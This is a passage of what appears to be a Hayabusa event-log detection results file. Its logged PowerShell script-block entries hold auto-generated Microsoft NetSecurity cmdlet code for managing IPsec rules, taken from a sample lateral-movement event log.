$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 